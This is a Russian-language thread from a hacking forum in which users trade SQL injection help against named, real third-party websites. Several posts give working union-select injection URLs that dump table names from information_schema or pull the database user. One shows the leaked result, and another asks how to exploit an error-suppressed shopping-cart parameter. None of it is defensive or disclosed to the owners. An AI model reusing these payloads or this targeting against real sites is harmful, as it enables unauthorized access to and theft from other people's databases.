ANTICHAT — форум по информационной безопасности, OSINT и технологиям

facepalm !!!, испортил настроение ...читай школоло мануалы..не забудь остановится в разделе про LIMIT ...откуда вы беретесь...иди лучше уроки готовь и пиши сочинение "как я провел новогодние каникулы"

qaz

Как бы воут,почитай факи.

http://www.feb.spb.ru/news.php?id=100+union+select+1,group_concat(table_ name),3,4,5,6,7+from+information_schema.tables--+

Если кому не трудно - поясните мне такую ситуацию

Там вроде файлы показываются, но вроде бы не все из того что показывается - имена файлов, так вот, хотелось бы чтоб, кто нить умный разжевал, почему это случилось, что это и с чем это едят, за ранее благодарю ))

не понял о чем ты, но там блайнд иньекция

потому что

includer.php

снанил сайты и попался такой:

http://www.sonicscience.com/store/index.php?id=0+uNioN+alL+sEleCT+1--

можете сказать что тут "уязвиного" ? как то я ничего не видел там.. но прога выдает, как уязвимым.

B1t.exe

там ничего нет.

и давайте не будем обсуждать подобного рода, и будем больше использовать свои знания.

Доброго. объясните темному пожалуйста, куда копать в таком случае:

https://secure.webblake.com/ShoppingCart569.php?k=query_here



не выводит ошибки вовсе. только саму квери если битая.

в тоже время параметр учавствует в 2х запросах, и вывести его, чтобы не вызывало ошибки - не могу.

http://www.mibf.ru/index.php?id=-1+union+select+null,null,null,null,null,null,null, user(),null,null--+

И в адресной строке ты увидешь:

http://www.mibf.ru/mibf@localhost

Ну ты понел...